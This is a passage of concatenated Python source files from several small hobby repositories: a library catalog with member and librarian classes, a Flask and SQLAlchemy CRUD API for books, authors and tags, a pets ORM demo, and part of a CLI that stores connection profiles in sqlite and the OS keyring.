catalog.addBookItem(b, '463hg','K1B2')
b = catalog.addBook('Pax','Sara Pennypacker', '2017', 288)
catalog.addBookItem(b,'554jk','M24A')
catalog.addBookItem(b,'556jk','M25A')
catalog.addBookItem(b,'557jk','M26A')
catalog.displayAllBooks()
# Removal: a whole title, then a single copy by isbn.
catalog.removeBook('Pax')
catalog.displayAllBooks()
catalog.removeBookItem('Shoe Dog','124hg')
catalog.displayAllBooks()
# Search by exact title and by author.
b = catalog.searchByName('Shoe Dog')
print (b)
b = catalog.searchByAuthor('J Foer')
print(b)
# Member workflow: browse, issue, return.
m1 = Member("Vish","Bangalore",23,'asljlkj22','std1233')
m1.availableBooks(catalog)
print (m1)
m1.issueBook('Moonwalking with Einstien',catalog)
m1.returnBook('Moonwalking with Einstien',catalog)
--- FILE SEPARATOR ---
from Book import Book
from Catalog import Catalog
from User import Member, Librarian
# Manual smoke-test script for the Librarian role: add/remove books and copies
# through the Librarian facade over a shared Catalog.
catalog = Catalog()
#reference to Librarian class object
librarian = Librarian("Awantik","Bangalore",34,'asljlkj22','zeke101')
#details of librarian
print (librarian)
# adding a book by librarian
b2 =librarian.addBook("This is Going to Hurt: Secret Diaries of a Junior Doctor","Adam Key",'2017', 302,catalog)
#adding details
librarian.addBookItem(b2,'234c','l203',catalog)
#displaying all the books till now added
librarian.displayAddedBook(catalog)
#library remove book
# NOTE(review): 'Shoe Dog' was never added to this catalog — removal is a no-op
# or an error depending on Catalog.removeBook; confirm intent.
librarian.removeBook('Shoe Dog',catalog)
librarian.addBookItem(b2,'235c','1204',catalog)
librarian.removeBookItemFromCatalog(catalog,"This is Going to Hurt: Secret Diaries of a Junior Doctor",'235c')
--- FILE SEPARATOR ---
# -*- coding: utf-8 -*-
from Catalog import Catalog
from Book import Book
class User:
    """Base library user: common identity fields shared by all roles."""

    def __init__(self, name, location, age, aadhar_id):
        """Store the caller-supplied identity fields on the instance."""
        self.name, self.location = name, location
        self.age, self.aadhar_id = age, aadhar_id
class Member(User):
    """A student member who can browse the catalog, issue and return books."""

    def __init__(self, name, location, age, aadhar_id, student_id):
        super().__init__(name, location, age, aadhar_id)
        self.student_id = student_id
        self.issued_book = []      # every BookItem currently held by this member
        self._held_by_title = {}   # book name -> list of held BookItems (for returns)

    def __repr__(self):
        return self.name + ' ' + self.location + ' ' + self.student_id

    def availableBooks(self, Catalog):
        """Print every book currently available in the catalog."""
        print("Available books are:")
        Catalog.displayAllBooks()

    #assume name is unique
    def issueBook(self, name, Catalog, days=10):
        """Issue the first available copy of *name*; prints the outcome."""
        book = Catalog.searchByName(name)
        if len(book.book_item) > 0:
            b1 = book.book_item[0]
            self.issued_book.append(b1)
            # Remember which title the copy belongs to so returnBook can find it.
            self._held_by_title.setdefault(name, []).append(b1)
            Catalog.removeBookItem(name, b1.isbn)
            print(name, "book is issued")  # bug fix: message typo "isssued"
        else:
            print("Book is not available")

    #assume name is unique
    def returnBook(self, name, Catalog):
        """Return one previously issued copy of *name* to the catalog.

        Bug fix: the original iterated with ``for self.items in ...`` and
        compared the whole ``book.book_item`` list against individual items,
        so no copy was ever actually returned.
        """
        held = self._held_by_title.get(name, [])
        if not held:
            print("Book is not issued")
            return
        b2 = held.pop(0)
        self.issued_book.remove(b2)
        book = Catalog.searchByName(name)
        Catalog.addBookItem(book, b2.isbn, b2.rack)
        print(name, "Book is returned")
class Librarian(User):
    """Staff user who manages the catalog and tracks the books they added."""

    def __init__(self, name, location, age, aadhar_id, emp_id):
        super().__init__(name, location, age, aadhar_id)
        self.emp_id = emp_id
        self.book2 = []  # Books added through this librarian

    def __repr__(self):
        return self.name + ' ' + self.location + ' ' + self.emp_id

    def addBook(self, name, author, publish_date, pages, Catalog):
        """Add a title to the catalog and remember it locally; returns the Book."""
        added = Catalog.addBook(name, author, publish_date, pages)
        self.book2.append(added)
        print("A book is added by Librarian")
        return added

    def addBookItem(self, book, isbn, rack, Catalog):
        """Register a physical copy of *book* in the catalog."""
        Catalog.addBookItem(book, isbn, rack)
        print("Details of the book is added")

    def displayAddedBook(self, Catalog):
        """Print all books currently in the catalog."""
        Catalog.displayAllBooks()

    def removeBook(self, name, Catalog):
        """Remove the title *name* and decrement the catalog's distinct-title count."""
        Catalog.removeBook(name)
        Catalog.different_book_count -= 1
        print("Book removed")

    def removeBookItemFromCatalog(self, Catalog, name, isbn):
        """Remove one physical copy (by isbn) of the title *name*."""
        Catalog.removeBookItem(name, isbn)
|
[
"/TestFunctions.py",
"/Test_Catalog_member.py",
"/Test_Library.py",
"/User.py"
] |
009Kings/Author-book-tags-Full-Crud
|
from flask import request, jsonify
from models import app
from functions import create_user, get_all_users, get_user, update_user, delete_user
from functions import create_author, get_all_authors, get_author, update_author, delete_author
from functions import create_book, get_all_books, get_book, update_book, delete_book
from functions import add_tag, remove_tag, get_all_tags, delete_tag
@app.route("/api/user", methods=["GET", "POST"])
def users_read_create():
    """User collection: GET lists every user, POST creates one from form data."""
    if request.method == "POST":
        return create_user(username=request.form['username'],
                           email=request.form['email'])
    if request.method == "GET":
        return get_all_users()
@app.route("/api/user/<id>", methods=["GET", "PUT", "DELETE"])
def one_user(id):
    """Single-user endpoint: fetch (GET), update (PUT) or remove (DELETE)."""
    actions = {
        "GET": lambda: get_user(id),
        "PUT": lambda: update_user(id, request.form['username'], request.form['email']),
        "DELETE": lambda: delete_user(id),
    }
    action = actions.get(request.method)
    return action() if action else None
@app.route("/api/author", methods=["GET", "POST"])
def authors_read_create():
    """Author collection: GET lists every author, POST creates one by name."""
    if request.method == "POST":
        return create_author(name=request.form['name'])
    if request.method == "GET":
        return get_all_authors()
@app.route("/api/author/<id>", methods=["GET", "PUT", "DELETE"])
def one_author(id):
    """Single-author endpoint: fetch, rename or delete author *id*."""
    actions = {
        "GET": lambda: get_author(id),
        "PUT": lambda: update_author(id, request.form['name']),
        "DELETE": lambda: delete_author(id),
    }
    action = actions.get(request.method)
    return action() if action else None
@app.route("/api/book", methods=["GET", "POST"])
def books_read_create():
    """Book collection: GET lists every book, POST creates one (title + author id)."""
    if request.method == "POST":
        return create_book(request.form['title'], request.form['author'])
    if request.method == "GET":
        return get_all_books()
@app.route("/api/book/<id>", methods=["GET", "PUT", "DELETE"])
def one_book(id):
    """Single-book endpoint: fetch, update or delete book *id*."""
    actions = {
        "GET": lambda: get_book(id),
        "PUT": lambda: update_book(id, request.form['title'], request.form['author']),
        "DELETE": lambda: delete_book(id),
    }
    action = actions.get(request.method)
    return action() if action else None
@app.route("/api/tag", methods=["POST", "PUT", "GET"])
def tag_read_create():
    """Tag collection: POST adds a tag (optionally to a book), PUT removes a
    tag from a book, GET lists all tags."""
    method = request.method
    if method == "POST":
        try:
            # A missing book_id means "create a bare tag" downstream.
            return add_tag(book_id=request.form.get('book_id'),
                           tag_name=request.form['tag'])
        except Exception as err:
            print("💥", err)
            return jsonify(message="problem in add tag route")
    if method == "PUT":
        try:
            return remove_tag(book_id=request.form['book_id'], tag=request.form['tag'])
        except Exception as err:
            print("💥", err)
            return jsonify(message="problem in update tag route")
    if method == "GET":
        try:
            return get_all_tags()
        except Exception as err:
            print("💥", err)
            return jsonify(message="problem in get tag route")
@app.route("/api/tag/<id>", methods=["DELETE"])
def one_tag(id):
    """Delete the tag at *id* (DELETE only)."""
    if request.method != "DELETE":
        return None
    try:
        return delete_tag(id)
    except Exception as err:
        print("💥", err)
        return jsonify(message="problem in delete tag route")
# Start the Flask development server only when this module is run directly.
if __name__ == '__main__':
    app.run(debug=True)
--- FILE SEPARATOR ---
from flask import request, jsonify, redirect
from models import app, db, User, user_schema, users_schema, Author, author_schema, authors_schema, Book, book_schema, books_schema, Tag, tags_schema
def add_tag(book_id, tag_name):
    """Attach *tag_name* to the book at *book_id*, or create a bare tag when
    no book id is supplied. Redirects on success, returns a JSON message on
    failure."""
    if not book_id:
        # No target book: just make sure the tag row exists.
        try:
            existing = Tag.query.filter_by(tag=tag_name).one_or_none()
            if not existing:
                db.session.add(Tag(tag=tag_name))
                db.session.commit()
            return redirect('/api/tag')
        except Exception as err:
            print("💥", err)
            return jsonify(message='Problem adding tag')
    try:
        book = Book.query.filter_by(id=book_id).one()
        # Reuse the existing tag row, or build a fresh (uncommitted) one.
        tag = Tag.query.filter_by(tag=tag_name).one_or_none() or Tag(tag=tag_name)
        if book and tag:
            book.tags.append(tag)
            db.session.commit()
            return redirect(f"/api/book/{book_id}")
        return jsonify(message='Problem in adding Tag')
    except Exception as err:
        print("💥", err)
        return jsonify(message='Problem adding tag')
def remove_tag(book_id, tag):
    """Detach the tag named *tag* from the book at *book_id*."""
    try:
        book = Book.query.filter_by(id=book_id).one_or_none()
        tag = Tag.query.filter_by(tag=tag).one_or_none()
        if not (book and tag):
            return jsonify(message=f"problem removing tag {tag} from book at id {book_id}")
        book.tags.remove(tag)
        db.session.commit()
        return redirect(f"/api/book/{book_id}")
    except Exception as err:
        print("💥", err)
        return jsonify(message='Problem removing tag from book')
def get_all_tags():
    """Serialize every tag row as JSON."""
    try:
        return tags_schema.jsonify(Tag.query.all(), many=True)
    except Exception as err:
        print("💥", err)
        return jsonify(message='Problem getting all tags')
def delete_tag(tag_id):
    """Delete the tag row at *tag_id* and redirect to the tag listing.

    Bug fix: when no tag matched, the original fell off the end of the
    ``try`` and implicitly returned None, which Flask rejects as a response;
    now an explicit JSON message is returned.
    """
    try:
        tag = Tag.query.get(tag_id)
        if tag:
            db.session.delete(tag)
            db.session.commit()
            return redirect("/api/tag")
        return jsonify(message=f'No tag found at id {tag_id}')
    except Exception as err:
        print("💥", err)
        return jsonify(message=f'Problem deleting tag at id {tag_id}')
def create_book(title, author):
    """Create a book with *title* and author id *author*, unless the same
    (title, author) pair already exists."""
    new_book = Book(title=title, author_id=author)
    try:
        duplicate = Book.query.filter_by(title=title).filter_by(author_id=author).one_or_none()
        if duplicate:
            return jsonify(message='Book already exists')
        db.session.add(new_book)
        db.session.commit()
        return book_schema.dump(new_book)
    except Exception as err:
        print("💥", err)
        return jsonify(message='Problem creating new book')
def get_all_books():
    """Serialize every book, or a placeholder message when the table is empty."""
    rows = Book.query.all()
    if not rows:
        return jsonify(message='No books')
    return jsonify(books_schema.dump(rows))
def get_book(id):
    """Serialize the book at *id*, or a JSON error message when it is missing.

    Bug fix: the original debug print dereferenced ``book.tags[0].id`` before
    the None-check, raising AttributeError for a missing book and IndexError
    for a book with no tags.
    """
    book = Book.query.get(id)
    if book:
        return book_schema.jsonify(book)
    else:
        return jsonify(message='Error getting book at {}'.format(id))
def update_book(id, title, author):
    """Update title/author of book *id* and redirect to its detail route.

    *author* is an author id (the same form value ``create_book`` stores in
    ``author_id``). Bug fix: the original assigned it to the ``author``
    relationship attribute, which expects an Author instance; the error
    message also wrongly said "author" instead of "book".
    """
    try:
        book = Book.query.get(id)
        book.title = title
        book.author_id = author
        db.session.commit()
        return redirect(f'/api/book/{id}')
    except Exception as err:
        print("💥", err)
        return jsonify(message='Error updating book at {}'.format(id))
def delete_book(id):
    """Delete book *id* and redirect to the book collection."""
    try:
        doomed = Book.query.get(id)
        db.session.delete(doomed)
        db.session.commit()
        return redirect('/api/book')
    except Exception as err:
        print("💥", err)
        return jsonify(message='Error deleting book at {}'.format(id))
def create_author(name):
    """Insert a new author row and return its serialized form."""
    row = Author(name=name)
    try:
        db.session.add(row)
        db.session.commit()
        return author_schema.dump(row)
    except Exception as err:
        print("💥", err)
        return jsonify(message='Problem creating new author')
def get_all_authors():
    """Serialize every author, or a message when none exist."""
    rows = Author.query.all()
    if not rows:
        return jsonify(message='No authors')
    return authors_schema.jsonify(rows, many=True)
def get_author(id):
    """Serialize the author at *id*, or an error message when missing."""
    author = Author.query.get(id)
    if not author:
        return jsonify(message='Error getting author at {}'.format(id))
    return author_schema.jsonify(author, many=False)
def update_author(id, name):
    """Rename author *id* and redirect back to its detail route."""
    try:
        row = Author.query.get(id)
        row.name = name
        db.session.commit()
        return redirect(f'/api/author/{id}')
    except Exception as err:
        print("💥", err)
        return jsonify(message='Error updating author at {}'.format(id))
def delete_author(id):
    """Delete author *id* and redirect to the author collection."""
    try:
        row = Author.query.get(id)
        db.session.delete(row)
        db.session.commit()
        return redirect('/api/author')
    except Exception as err:
        print("💥", err)
        return jsonify(message='Error deleting author at {}'.format(id))
def create_user(username, email):
    """Insert a user row and return its serialized form.

    NOTE(review): any database failure is reported as "User already exists"
    (original behavior preserved).
    """
    row = User(username, email)
    try:
        db.session.add(row)
        db.session.commit()
        return user_schema.dump(row)
    except Exception as err:
        print("💥", err)
        return jsonify(message='User already exists')
def get_all_users():
    """Serialize every user, or a message when the table is empty."""
    rows = User.query.all()
    if not rows:
        return jsonify(message='No users')
    return jsonify(users_schema.dump(rows))
def get_user(id):
    """Serialize the user at *id*, or an error message when missing."""
    row = User.query.get(id)
    if not row:
        return jsonify(message='Error getting user at {}'.format(id))
    return user_schema.jsonify(row)
def update_user(id, username, email):
    """Overwrite username/email of user *id* and redirect to its detail route."""
    try:
        row = User.query.get(id)
        row.username = username
        row.email = email
        db.session.commit()
        return redirect(f'/api/user/{id}')
    except Exception as err:
        print("💥", err)
        return jsonify(message='Error updating user at {}'.format(id))
def delete_user(id):
    """Remove user *id* and redirect to the user collection."""
    try:
        row = User.query.get(id)
        db.session.delete(row)
        db.session.commit()
        return redirect('/api/user')
    except Exception as err:
        print("💥", err)
        return jsonify(message='Error deleting user at {}'.format(id))
--- FILE SEPARATOR ---
from flask import Flask, request, jsonify
from flask_sqlalchemy import SQLAlchemy
from flask_marshmallow import Marshmallow
app = Flask(__name__)
# NOTE(review): hard-coded local Postgres DSN — consider an env var for deploys.
app.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql://kingkong@localhost/flasktoot1'
db = SQLAlchemy(app)
ma = Marshmallow(app)
class User(db.Model):
    """Application user with unique username and email."""
    __tablename__ = 'users'
    id = db.Column(db.Integer, primary_key=True)
    username = db.Column(db.String(80), unique=True)
    email = db.Column(db.String(120), unique=True)
    def __init__(self, username, email):
        self.username = username
        self.email = email
class Author(db.Model):
    """An author; owns a dynamic (query-on-access) collection of books."""
    __tablename__ = 'authors'
    id = db.Column(db.Integer, primary_key=True)
    name = db.Column(db.String(255))
    books = db.relationship("Book", back_populates="author", lazy="dynamic")
# Association table for the Book <-> Tag many-to-many (composite primary key).
book_tags = db.Table('book_tags',
    db.Column('tag_id', db.Integer, db.ForeignKey('tags.id'), primary_key=True),
    db.Column('book_id', db.Integer, db.ForeignKey('books.id'), primary_key=True)
)
class Book(db.Model):
    """A book; belongs to one Author and carries many Tags via book_tags."""
    __tablename__ = 'books'
    id = db.Column(db.Integer, primary_key=True)
    title = db.Column(db.String(255))
    author_id = db.Column(db.Integer, db.ForeignKey("authors.id"))
    author = db.relationship("Author", back_populates="books")
    # NOTE(review): cascade="all,delete" on a many-to-many deletes the shared
    # Tag rows when a book is deleted — confirm that is intended.
    tags = db.relationship("Tag", secondary=book_tags,
        back_populates="books", lazy="subquery",
        cascade="all,delete")
class Tag(db.Model):
    """A unique tag name, shareable across books via book_tags."""
    __tablename__ = 'tags'
    id = db.Column(db.Integer, primary_key=True)
    tag = db.Column(db.String(50), unique=True)
    books = db.relationship("Book", secondary=book_tags,
        back_populates="tags", cascade="delete")
class UserSchema(ma.Schema):
    """Serializer for User rows."""
    class Meta:
        # Fields to expose
        fields = ('id', 'username', 'email')
class AuthorSchema(ma.ModelSchema):
    """Serializer for Author rows; books are rendered as hyperlinks."""
    class Meta:
        model = Author
        fields = ('id', 'name', 'books')
    books = ma.List(ma.HyperlinkRelated("one_book"))
    # NOTE(review): 'author' does not match any visible endpoint name
    # ('one_author' / 'authors_read_create') — verify these URLFor targets.
    links = ma.Hyperlinks({
        'self': ma.URLFor('author', id='<id>'),
        'collection': ma.URLFor('author'),
    })
class TagSchema(ma.TableSchema):
    """Serializer for Tag rows; exposes only the tag name."""
    class Meta:
        table = Tag.__table__
        fields = ['tag']
# Defining via model or table schema
# class BookSchema(ma.TableSchema):
# class Meta:
# table = Book.__table__
# fields = ('id', 'title', 'author')
# author = ma.Nested(AuthorSchema)
# links = ma.Hyperlinks({
# 'self': {
# 'href': ma.URLFor('book', id='<id>'),
# 'title': 'book_detail'
# },
# 'collection': ma.URLFor('book'),
# })
# If we want to reference the hyper link instead of nest the model
class BookSchema(ma.ModelSchema):
    """Serializer for Book rows: author as a hyperlink, tags nested inline."""
    class Meta:
        model = Book
        fields = ('id', 'title', 'author', 'tags')
    author = ma.HyperlinkRelated("one_author")
    tags = ma.List(ma.Nested(TagSchema))
    # NOTE(review): 'book' does not match any visible endpoint name
    # ('one_book' / 'books_read_create') — verify these URLFor targets.
    links = ma.Hyperlinks({
        'self': {
            'href': ma.URLFor('book', id='<id>'),
            'title': 'book_detail'
        },
        'collection': ma.URLFor('book'),
    })
# Reusable serializer instances: singular and collection (many=True) forms.
user_schema = UserSchema()
users_schema = UserSchema(many=True)
author_schema = AuthorSchema()
authors_schema = AuthorSchema(many=True)
book_schema = BookSchema()
books_schema = BookSchema(many=True)
tag_schema = TagSchema()
tags_schema = TagSchema(many=True)
# --------- Some seed data --------- #
# Create the tables first: the queries below fail when the schema does not
# exist yet (the original only called db.create_all() at the end of the module).
db.create_all()
# NOTE(review): .one() raises if these authors are not already present —
# this seed block assumes a pre-populated authors table.
author = Author.query.filter_by(name="Chuck Paluhniuk").one()
book = Book(title="Fight Club", author=author)
db.session.add(book)
jrrt = Author.query.filter_by(name="J.R.R. Tolkien").one()
jrrt_books = [
    Book(title="The Hobbit", author=jrrt),
    Book(title="The Lord of the Rings", author=jrrt),
    Book(title="The Silmarillion", author=jrrt),
]
db.session.add_all(jrrt_books)
db.session.commit()
tag = Tag(tag="fantasy")
lotr = db.session.query(Book).filter_by(author_id=2).all()
for book in lotr:
    book.tags.append(tag)
# Bug fix: removed ``lotr.tags.append(tag)`` — *lotr* is a plain list with no
# .tags attribute, so that line raised AttributeError at import time.
db.session.commit()
|
[
"/api.py",
"/functions.py",
"/models.py"
] |
009Kings/squalchemy_testin
|
import sqlalchemy
from sqlalchemy import create_engine
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import relationship
from sqlalchemy import Column, String, Integer, Sequence, ForeignKey, Table
# Engine against a local Postgres database; echo=True logs all emitted SQL.
engine = create_engine('postgresql://localhost/sqlalchemy_pets', echo=True)
Base = declarative_base()
# Association table for the Pet <-> Toy many-to-many (composite primary key).
pet_toys = Table('pet_toys', Base.metadata,
    Column('toy_id', ForeignKey('toys.id'), primary_key=True),
    Column('pet_id', ForeignKey('pets.id'), primary_key=True)
)
class User(Base):
    """A pet owner; deleting a user cascades to their pets."""
    __tablename__= 'users'
    id = Column(Integer, Sequence('user_id_seq'), primary_key=True)
    name = Column(String, nullable=False)
    email = Column(String, unique=True)
    nickname = Column(String(50))
    pets = relationship('Pet', back_populates='user', cascade='all, delete, delete-orphan')
    def __repr__(self):
        return f'🌝<User(id={self.id}, name={self.name}, email={self.email}, nickname={self.nickname})>'
class Pet(Base):
    """A pet; belongs to one User and shares Toys via pet_toys."""
    __tablename__ = 'pets'
    id = Column(Integer, Sequence('pet_id_seq'), primary_key=True)
    name = Column(String, nullable=False)
    species = Column(String, nullable=False)
    age = Column(Integer)
    # DB-level cascade complements the ORM-level cascade on User.pets.
    user_id = Column(Integer, ForeignKey('users.id', ondelete='CASCADE'))
    user = relationship('User', back_populates='pets')
    toys = relationship('Toy', secondary=pet_toys, back_populates='pets')
    def __repr__(self):
        return f'🦚<Pet(id={self.id}, name={self.name}, species={self.species}, age={self.age}, user_id={self.user_id})>'
class Toy(Base):
    """A toy item, shareable across pets via pet_toys."""
    __tablename__ = 'toys'
    id = Column(Integer, Sequence('toy_id_seq'), primary_key=True)
    item = Column(String, nullable=False, unique=True)
    pets = relationship('Pet', secondary=pet_toys, back_populates='toys')
    def __repr__(self):
        return f'🧳<Toy(id={self.id}, item={self.item})>'
# Migrates everything
# Emits CREATE TABLE for every model above (no-op for existing tables).
Base.metadata.create_all(engine)
--- FILE SEPARATOR ---
import sqlalchemy
from sqlalchemy.orm import sessionmaker
from models import engine, User, Pet, Toy
Session = sessionmaker(bind=engine)
def user_crud():
    """Demo of User create/read/update/delete in one session; commits at the end."""
    session = Session()
    # Create
    tosspot = User(name='Gavin Callander',
                   email='gavin.callander@generalassemb.ly',
                   nickname='Gav')
    session.add(tosspot)
    session.add_all([
        User(name='Wendy Williams', email='windywendy@gmail.com', nickname='WW'),
        User(name='Steven Peters', email='stpets@bigdaddybezos.com', nickname='Stpets'),
        User(name='Michael Schull', email='vashonbum@gmail.com', nickname='Mike'),
        User(name='Madison Edmiston', email='madison.edmiston@ga.co', nickname='Mads')
    ])
    # Read
    go_to_gal = session.query(User).filter_by(nickname='Mads').first()
    # Update: dirty attribute is flushed by the commit below.
    go_to_gal.email = 'madison.edmiston@generalassemb.ly'
    # DESTROY
    session.delete(tosspot)
    session.query(User).filter_by(nickname="WW").delete()
    session.commit()
def pet_crud():
    """Demo of attaching Pet rows to a user through the relationship collection."""
    session = Session()
    go_to_gal = session.query(User).filter_by(nickname='Mads').first()
    # Assigning the collection replaces it; += appends a second pet.
    go_to_gal.pets = [Pet(name='Emmy', species='dog', age=2)]
    # emmy = session.query(Pet).filter_by(name='Emmy').first()
    go_to_gal.pets += [Pet(name='Blub', species='fish')]
    # print(go_to_gal.pets)
    # session.delete(go_to_gal)
    # print(session.query(Pet).filter_by(name='Emmy').count())
    session.commit()
def toy_crud():
    """Demo of the Pet <-> Toy many-to-many: give Emmy two toys and commit."""
    session = Session()
    a_user = session.query(User).first()
    print(a_user)
    emmy = session.query(Pet).filter_by(name='Emmy').first()
    emmy.toys = [Toy(item='ball')]
    emmy.toys.append(Toy(item='squeeky duck'))
    print(emmy.toys)
    session.commit()
def user_query(id):
    """Print the user row whose primary key is *id* (None when absent)."""
    session = Session()
    match = session.query(User).filter_by(id=id).first()
    print("🥼")
    print(match)
# Manual smoke-run: look up user id 25 when executed directly.
if __name__ == '__main__':
    user_query(25)
|
[
"/models.py",
"/server.py"
] |
00Duck/DetectiveSparky
|
import getpass
import click
import sqlite3
import keyring
from pathlib import Path
import os
def startup_profile():
    """Ensure the sparky sqlite database and its ``profile`` table exist.

    Creates the database file next to the package root when missing and exits
    the process with an error message if it cannot be opened.

    Bug fix: the bare ``except:`` clauses (which also swallow SystemExit and
    KeyboardInterrupt) were narrowed to ``except Exception``.
    """
    import sys
    try:
        # parent.parent is only needed here since this file is in cmd_funcs
        wd = Path(__file__).parent.parent.resolve()
        conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
    except Exception:
        try:
            wd = Path(__file__).parent.parent.resolve()
            # Fall back to letting the sqlite3 CLI create the file, then retry.
            os.system("sqlite3 " + os.path.join(wd, 'sparky.db'))
            conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
        except Exception:
            click.secho("Failed to load sparky database.", fg="red")
            sys.exit()
    try:
        cur = conn.cursor()
        cur.execute('''CREATE TABLE IF NOT EXISTS profile (
            profile_name text,
            url text,
            user text,
            selected int
        );''')
        conn.commit()
    except Exception:
        click.secho("Error connecting to profile. Please check the sparky database or recreate if you are having issues.", fg="red")
        sys.exit()
    finally:
        conn.close()
def new_profile():
    """Interactively collect a profile (name, URL, user, password), store the
    row in sqlite and the password in the OS keyring."""
    click.echo("\nEnter a profile name")
    pn = input(click.style(">> ", fg="bright_white", bold=True))
    click.echo("Enter a URL")
    url = input(click.style(">> ", fg="bright_white", bold=True))
    click.echo("Enter an admin user name")
    user = input(click.style(">> ", fg="bright_white", bold=True))
    click.echo("Enter the user's password")
    # getpass keeps the password out of the terminal echo.
    pw = getpass.getpass(prompt=click.style(">> ", fg="bright_white", bold=True), stream=None)
    if pn == "" or url == "" or user == "" or pw == "":
        click.echo("Missing input - profile not created.")
        return
    try:
        wd = Path(__file__).parent.parent.resolve()
        conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
        cur = conn.cursor()
        # selected defaults to 0 (not the active profile).
        cur.execute('''insert into profile values (?, ?, ?, ?)''', (pn, url, user, 0))
        conn.commit()
        if cur.lastrowid != 0:
            click.echo("Profile " + pn + " created.")
            # Keyring service name embeds rowid + profile name for uniqueness.
            keyring.set_password("sparky - " + str(cur.lastrowid) + " - " + pn, user, pw)
    except Exception as e:
        click.secho("Error creating profile " + pn + ": " + str(e), fg="red")
    finally:
        # NOTE(review): conn is unbound here if sqlite3.connect itself raised.
        conn.close()
def list_profiles():
    """Print a table of all saved profiles and return the fetched rows.

    Returns ``[]`` when there are no profiles or when the query fails.
    Bug fix: the original raised NameError in ``finally``/``return`` when
    ``sqlite3.connect`` failed before ``conn``/``profs`` were bound.
    """
    conn = None
    profs = []
    try:
        click.echo()
        wd = Path(__file__).parent.parent.resolve()
        conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
        cur = conn.cursor()
        profs = cur.execute('''SELECT rowid, profile_name, user, selected, url FROM profile''').fetchall()
        if profs == []:
            click.echo("You have no profiles. Type 'sparky profile new' to create a new one.\n")
        else:
            click.secho("{:<15} {:<20} {:<30} {:<10} {:<30}".format('Row ID', 'Profile Name', 'User', 'Selected', 'URL'), fg="bright_white", bold=True)
            for i in profs:
                click.echo("{:<15} {:<20} {:<30} {:<10} {:<30}".format(i[0], i[1], i[2], '' if i[3] == 0 else 'True', i[4]))
    except Exception as e:
        click.secho("Error listing profiles: " + str(e), fg="red")
    finally:
        if conn is not None:
            conn.close()
    return profs
def delete_profile():
    """Prompt for a profile Row ID, then delete its row and its keyring entry."""
    profiles = list_profiles()
    if len(profiles) > 0:
        click.echo("\nEnter the Row ID to delete")
        rowid = input(click.style(">> ", fg="bright_white", bold=True))
    else:
        return
    try:
        int(rowid) # throw ValueError if we didn't get an integer
    except ValueError:
        click.secho("Invalid input.", fg="red")
        return
    try:
        wd = Path(__file__).parent.parent.resolve()
        conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
        cur = conn.cursor()
        # Fetch the name/user first so the matching keyring entry can be removed.
        sel_resp = cur.execute("""SELECT profile_name, user FROM profile WHERE rowid = ?;""", (rowid,)).fetchone()
        if sel_resp != None:
            try:
                keyring.delete_password("sparky - " + rowid + " - " + sel_resp[0], sel_resp[1])
            except Exception as e:
                # Keyring failure is non-fatal; the DB row is still deleted below.
                click.secho("Could not delete password in keychain: " + str(e), fg="red")
        del_resp = cur.execute("""DELETE FROM profile WHERE rowid = ?;""", (rowid,))
        conn.commit()
        if del_resp.rowcount == 0:
            click.echo("Could not find row " + str(rowid) + " to delete")
        else:
            click.echo("Profile deleted.")
    except Exception as e:
        click.secho("Error deleting profile with rowid " + rowid + ": " + str(e), fg="red")
    finally:
        # NOTE(review): conn is unbound here if sqlite3.connect itself raised.
        conn.close()
def edit_profile():
    """Prompt for a Row ID and interactively edit that profile's fields.

    ENTER keeps the current value. The keyring entry is re-created under the
    (possibly new) profile name/user.
    """
    profiles = list_profiles()
    if len(profiles) > 0:
        click.echo("\nEnter the Row ID to edit")
        rowid = input(click.style(">> ", fg="bright_white", bold=True))
    else:
        return
    try:
        int(rowid) # throw ValueError if we didn't get an integer
    except ValueError:
        click.secho("Invalid input.", fg="red")
        return
    try:
        wd = Path(__file__).parent.parent.resolve()
        conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
        cur = conn.cursor()
        sel_resp = cur.execute("""SELECT profile_name, url, user, selected FROM profile WHERE rowid = ?;""", (rowid,)).fetchone()
        if sel_resp == None:
            click.secho("No profile found with Row ID " + rowid, fg="red")
            return
        profile_name = sel_resp[0]
        url = sel_resp[1]
        user = sel_resp[2]
        selected = sel_resp[3]
        try:
            pw = keyring.get_password("sparky - " + rowid + " - " + profile_name, user)
        except:
            pw = ""
        # Each prompt defaults to the existing value when the user presses ENTER.
        click.echo("Input new Profile Name (or press ENTER to skip)")
        edit_profile_name = input(click.style("(" + profile_name + ") >> ", fg="bright_white", bold=True)) or profile_name
        click.echo("Input new URL (or press ENTER to skip)")
        edit_url = input(click.style("(" + url + ") >> ", fg="bright_white", bold=True)) or url
        click.echo("Input new User (or press ENTER to skip)")
        edit_user = input(click.style("(" + user + ") >> ", fg="bright_white", bold=True)) or user
        click.echo("Input new Password (or press ENTER to skip)")
        edit_password = getpass.getpass(prompt=click.style(">> ", fg="bright_white", bold=True), stream=None) or pw
        # Replace the keyring entry: service name embeds the profile name, so
        # the old entry must be deleted before storing under the new name.
        try:
            keyring.delete_password("sparky - " + rowid + " - " + profile_name, user)
        except:
            pass
        try:
            keyring.set_password("sparky - " + rowid + " - " + edit_profile_name, edit_user, edit_password)
        except:
            pass
        cur.execute("""UPDATE profile SET profile_name = ?, url = ?, user = ?, selected = ? WHERE rowid = ?;""", (edit_profile_name, edit_url, edit_user, selected, rowid) )
        conn.commit()
    except Exception as e:
        click.secho("Error editing profile with rowid " + rowid + ": " + str(e), fg="red")
    finally:
        # NOTE(review): conn is unbound here if sqlite3.connect itself raised.
        conn.close()
def select_profile():
    """Prompt for a Row ID and mark that profile as the single selected one."""
    profiles = list_profiles()
    if len(profiles) > 0:
        click.echo("\nEnter the Row ID to select")
        rowid = input(click.style(">> ", fg="bright_white", bold=True))
    else:
        return
    try:
        int(rowid) # throw ValueError if we didn't get an integer
    except ValueError:
        click.secho("Invalid input.", fg="red")
        return
    try:
        wd = Path(__file__).parent.parent.resolve()
        conn = sqlite3.connect(os.path.join(wd, 'sparky.db'))
        cur = conn.cursor()
        sel_resp = cur.execute("""UPDATE profile SET selected = 1 WHERE rowid = ?;""", (rowid,))
        if sel_resp.rowcount == 0:
            click.echo("Could not find row " + str(rowid) + " to select")
        else:
            # Deselect every other profile so exactly one row has selected = 1.
